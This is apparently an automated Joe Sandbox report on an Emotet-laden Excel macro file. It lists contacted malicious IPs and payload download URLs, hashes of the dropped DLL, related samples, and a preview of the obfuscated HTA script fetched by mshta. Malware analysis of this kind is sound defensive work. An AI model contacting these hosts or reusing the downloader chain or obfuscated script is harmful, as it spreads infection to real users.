                                        http://www.piriform.com/ccleanerpowershell.exe, 00000006.00000002.676609575.000000000028B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://91.240.118.172/cc/vv/fe.ppowershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://91.240.118.172/cc/vv/fe.htmlhttp://91.240.118.172/cc/vv/fe.htmlmshta.exe, 00000004.00000003.422354344.0000000002DF5000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://secure.comodo.com/CPS0rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.entrust.net/2048ca.crl0rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://hekmat20.com/wp-includes/7/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://91.240.118.172/cc/vv/fe.htmlimshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://91.240.118.172/cc/vv/fe.htmlngsmshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                195.154.133.20
                                                		unknownFrance
                                                		12876OnlineSASFRtrue
                                                185.157.82.211
                                                		unknownPoland
                                                		42927S-NET-ASPLtrue
                                                212.237.17.99
                                                		unknownItaly
                                                		31034ARUBA-ASNITtrue
                                                79.172.212.216
                                                		unknownHungary
                                                		61998SZERVERPLEXHUtrue
                                                110.232.117.186
                                                		unknownAustralia
                                                		56038RACKCORP-APRackCorpAUtrue
                                                173.214.173.220
                                                		unknownUnited States
                                                		19318IS-AS-1UStrue
                                                212.24.98.99
                                                		unknownLithuania
                                                		62282RACKRAYUABRakrejusLTtrue
                                                138.185.72.26
                                                		unknownBrazil
                                                		264343EmpasoftLtdaMeBRtrue
                                                178.63.25.185
                                                		unknownGermany
                                                		24940HETZNER-ASDEtrue
                                                160.16.102.168
                                                		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                81.0.236.90
                                                		unknownCzech Republic
                                                		15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                                103.75.201.2
                                                		unknownThailand
                                                		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                                216.158.226.206
                                                		unknownUnited States
                                                		19318IS-AS-1UStrue
                                                45.118.115.99
                                                		unknownIndonesia
                                                		131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                                                51.15.4.22
                                                		unknownFrance
                                                		12876OnlineSASFRtrue
                                                159.89.230.105
                                                		unknownUnited States
                                                		14061DIGITALOCEAN-ASNUStrue
                                                51.81.152.36
                                                		mycloud.suplitecmo.comUnited States
                                                		16276OVHFRfalse
                                                162.214.50.39
                                                		unknownUnited States
                                                		46606UNIFIEDLAYER-AS-1UStrue
                                                200.17.134.35
                                                		unknownBrazil
                                                		1916AssociacaoRedeNacionaldeEnsinoePesquisaBRtrue
                                                217.182.143.207
                                                		unknownFrance
                                                		16276OVHFRtrue
                                                107.182.225.142
                                                		unknownUnited States
                                                		32780HOSTINGSERVICES-INCUStrue
                                                51.38.71.0
                                                		unknownFrance
                                                		16276OVHFRtrue
                                                45.118.135.203
                                                		unknownJapan63949LINODE-APLinodeLLCUStrue
                                                50.116.54.215
                                                		unknownUnited States
                                                		63949LINODE-APLinodeLLCUStrue
                                                131.100.24.231
                                                		unknownBrazil
                                                		61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                                                46.55.222.11
                                                		unknownBulgaria
                                                		34841BALCHIKNETBGtrue
                                                41.76.108.46
                                                		unknownSouth Africa
                                                		327979DIAMATRIXZAtrue
                                                173.212.193.249
                                                		unknownGermany
                                                		51167CONTABODEtrue
                                                45.176.232.124
                                                		unknownColombia
                                                		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                                                178.79.147.66
                                                		unknownUnited Kingdom
                                                		63949LINODE-APLinodeLLCUStrue
                                                212.237.5.209
                                                		unknownItaly
                                                		31034ARUBA-ASNITtrue
                                                162.243.175.63
                                                		unknownUnited States
                                                		14061DIGITALOCEAN-ASNUStrue
                                                176.104.106.96
                                                		unknownSerbia
                                                		198371NINETRStrue
                                                207.38.84.195
                                                		unknownUnited States
                                                		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                                164.68.99.3
                                                		unknownGermany
                                                		51167CONTABODEtrue
                                                192.254.71.210
                                                		unknownUnited States
                                                		64235BIGBRAINUStrue
                                                212.237.56.116
                                                		unknownItaly
                                                		31034ARUBA-ASNITtrue
                                                104.168.155.129
                                                		unknownUnited States
                                                		54290HOSTWINDSUStrue
                                                45.142.114.231
                                                		unknownGermany
                                                		44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                                203.114.109.124
                                                		unknownThailand
                                                		131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                                                209.59.138.75
                                                		unknownUnited States
                                                		32244LIQUIDWEBUStrue
                                                159.8.59.82
                                                		unknownUnited States
                                                		36351SOFTLAYERUStrue
                                                129.232.188.93
                                                		unknownSouth Africa
                                                		37153xneeloZAtrue
                                                91.240.118.172
                                                		unknownunknown
                                                		49453GLOBALLAYERNLtrue
                                                58.227.42.236
                                                		unknownKorea Republic of
                                                		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                213.186.33.4
                                                		weezual.frFrance
                                                		16276OVHFRfalse
                                                158.69.222.101
                                                		unknownCanada
                                                		16276OVHFRtrue
                                                104.251.214.46
                                                		unknownUnited States
                                                		54540INCERO-HVVCUStrue

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:562386
                                                Start date:28.01.2022
                                                Start time:20:38:51
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 12m 16s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:NZW-010122 BNUV-280122.xlsm
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:18
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winXLSM@21/12@2/48
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HDC Information:
                                                • Successful, ratio: 21.2% (good quality ratio 17.8%)
                                                • Quality average: 65.1%
                                                • Quality standard deviation: 33.2%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 53
                                                • Number of non-executed functions: 197
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .xlsm
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 92.123.101.170, 92.123.101.210, 92.123.101.218
                                                • Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
                                                • Execution Graph export aborted for target mshta.exe, PID 2756 because there are no executed function
                                                • Execution Graph export aborted for target powershell.exe, PID 3016 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                20:39:22API Interceptor59x Sleep call for process: mshta.exe modified
                                                20:39:25API Interceptor442x Sleep call for process: powershell.exe modified
                                                20:39:42API Interceptor145x Sleep call for process: rundll32.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                195.154.133.20iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                  iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                    iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                      iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                        iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                          imedpub.xlsGet hashmaliciousBrowse
                                                            InnovincConf_1.xlsGet hashmaliciousBrowse
                                                              innovinc.org.xlsGet hashmaliciousBrowse
                                                                ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                  Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                    Innovincconferences.xlsGet hashmaliciousBrowse
                                                                      zb.dllGet hashmaliciousBrowse
                                                                        9vn5uo9AGs0AM.dllGet hashmaliciousBrowse
                                                                          irtW.dllGet hashmaliciousBrowse
                                                                            FMPeUASgI.dllGet hashmaliciousBrowse
                                                                              Opast International.xlsGet hashmaliciousBrowse
                                                                                mfdPZSLZ.dllGet hashmaliciousBrowse
                                                                                  t7kEPEwwtqM3JO.dllGet hashmaliciousBrowse
                                                                                    iMedPub LTD.xlsGet hashmaliciousBrowse
                                                                                      ZdWPfHBuxxcbyI0v.dllGet hashmaliciousBrowse
                                                                                        185.157.82.211iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                          iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                            iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                              iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                  imedpub.xlsGet hashmaliciousBrowse
                                                                                                    InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                      innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                        ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                          Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                            Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                              zb.dllGet hashmaliciousBrowse
                                                                                                                9vn5uo9AGs0AM.dllGet hashmaliciousBrowse
                                                                                                                  irtW.dllGet hashmaliciousBrowse
                                                                                                                    FMPeUASgI.dllGet hashmaliciousBrowse
                                                                                                                      Opast International.xlsGet hashmaliciousBrowse
                                                                                                                        mfdPZSLZ.dllGet hashmaliciousBrowse
                                                                                                                          t7kEPEwwtqM3JO.dllGet hashmaliciousBrowse
                                                                                                                            iMedPub LTD.xlsGet hashmaliciousBrowse
                                                                                                                              ZdWPfHBuxxcbyI0v.dllGet hashmaliciousBrowse

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                weezual.frOmmega.xlsGet hashmaliciousBrowse
                                                                                                                                • 213.186.33.4
                                                                                                                                mycloud.suplitecmo.comOmmega.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.81.152.36

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                S-NET-ASPLiMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                imedpub.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                zb.dllGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                9vn5uo9AGs0AM.dllGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                irtW.dllGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                FMPeUASgI.dllGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                Opast International.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                mfdPZSLZ.dllGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                t7kEPEwwtqM3JO.dllGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                iMedPub LTD.xlsGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                ZdWPfHBuxxcbyI0v.dllGet hashmaliciousBrowse
                                                                                                                                • 185.157.82.211
                                                                                                                                OnlineSASFRiMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                imedpub.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                info_301.xlsGet hashmaliciousBrowse
                                                                                                                                • 195.154.146.35
                                                                                                                                InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                zb.dllGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                9vn5uo9AGs0AM.dllGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                irtW.dllGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                FMPeUASgI.dllGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                Opast International.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                mfdPZSLZ.dllGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                t7kEPEwwtqM3JO.dllGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22
                                                                                                                                iMedPub LTD.xlsGet hashmaliciousBrowse
                                                                                                                                • 51.15.4.22

                                                                                                                                JA3 Fingerprints

                                                                                                                                No context

                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                C:\ProgramData\JooSee.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):548864
                                                                                                                                Entropy (8bit):6.980528809006344
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:B2AavzUBPSczbeeTLjvRyMwWd3DYr6i64/:OUBPSczbeeTnvFZDWA
                                                                                                                                MD5:8BD62A28212A7FB5A6F44AA4E8C2A9ED
                                                                                                                                SHA1:EE143CDC53AA8D42DED5A590718748BFF889058D
                                                                                                                                SHA-256:CE03150C100640C640AC5C02B24658C61527654DCAEEFA64FFE3DF24CE92E81D
                                                                                                                                SHA-512:1DB5553F5E4F2F9082B8933D50520F26F6AD77EA3E5FAD9ECA2C7C96A8E191D106608150C8ADC3278180FC3675EB41B35C0F0AA5AAD28C8C667E9B4A69A176B8
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):61414
                                                                                                                                Entropy (8bit):7.995245868798237
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                                                MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                                                SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                                                SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                                                SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                                                Malicious:false
                                                                                                                                Preview:MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

                                                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):328
                                                                                                                                Entropy (8bit):3.1244568012511515
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:kKRpk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:Jp9kPlE99SNxAhUeYlUSA/t
                                                                                                                                MD5:DC338BA4CED22309E86A606DD1278B71
                                                                                                                                SHA1:59BC123FF630D070DF07C9E4635627F34E03233A
                                                                                                                                SHA-256:728DC32AE1D099E30D4FC5D30DC4FF9CD5D374DE403046A6AA0D2218D049D597
                                                                                                                                SHA-512:7DCDAB0EF43D6327E98496F0739BBF1A269E6078EECC0271569E4D3EA083BEA91F6891F8FD69CE8FA46B1B107B7D5E1C6933FC9F9CC9FED1ACD0EE3C4B025FF9
                                                                                                                                Malicious:false
                                                                                                                                Preview:p...... ........Y..#....(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\mshta.exe
                                                                                                                                File Type:data
                                                                                                                                Category:downloaded
                                                                                                                                Size (bytes):11076
                                                                                                                                Entropy (8bit):6.175226521386573
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:aYCuCkQ5yT/yBkFwvrJ8o2bwcwJckCK5N/JR0In++uYJv1FLnb69Ree/K+HNRd:aYCPkkyT/yy0qacnkCoqJU9pnW/Kgv
                                                                                                                                MD5:E43FD46945688079796528C687495CC6
                                                                                                                                SHA1:165FB805FF8F3470F416CBBF3D67EB1D09B5B9A2
                                                                                                                                SHA-256:A71C840B44FDCDF0C4066304B4FDC54E7E57A7F9FBA4F83D3B02739825F9B93C
                                                                                                                                SHA-512:F364A43E470442A596B137DC9C8AD3E0936D75C9C1BE29587492B5F5E7F941137D6AC96CBC12746C8139B314BBC8B8FF708F01EAB24423BC3EA484386CDDB639
                                                                                                                                Malicious:false
                                                                                                                                IE Cache URL:http://91.240.118.172/cc/vv/fe.html
                                                                                                                                Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';i8Hwi4f5v6ham=new Array();p2N61T634cG0v=new Array();p2N61T634cG0v[0]='g%77%35n%53\172%32%76' ;i8Hwi4f5v6ham[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.v.\\.1.4.1.%.7.2.%.2.

                                                                                                                                C:\Users\user\AppData\Local\Temp\Cab51F7.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):61414
                                                                                                                                Entropy (8bit):7.995245868798237
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                                                MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                                                SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                                                SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                                                SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                                                Malicious:false
                                                                                                                                Preview:MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

                                                                                                                                C:\Users\user\AppData\Local\Temp\Tar51F8.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                File Type:data
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):161595
                                                                                                                                Entropy (8bit):6.302448239972517
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:FlYXleUpAR73k/99oFr+yQNujWNWv+1w/A/rHeGyjYPjCQarsmt6Q/GM:F+X7ARcqhQNujZv+mQjCjrsSP
                                                                                                                                MD5:D99661D0893A52A0700B8AE68457351A
                                                                                                                                SHA1:01491FD23C4813A602D48988531EA4ABBCDF7ED9
                                                                                                                                SHA-256:BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003
                                                                                                                                SHA-512:6F2291CA958CBF5423CBBE570FD871C4D379A435BE692908CAAACF4C2A68BD81008254802D4F4B212165E93B126ED871A62EAF3067909EB855B29573FC325B8E
                                                                                                                                Malicious:false
                                                                                                                                Preview:0..w6..*.H.........w&0..w!...1.0...`.H.e......0..g5..+.....7.....g%0..g 0...+.....7.........\.H....211018201437Z0...+......0..f.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFBC9296F2442240FA.TMP

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):28672
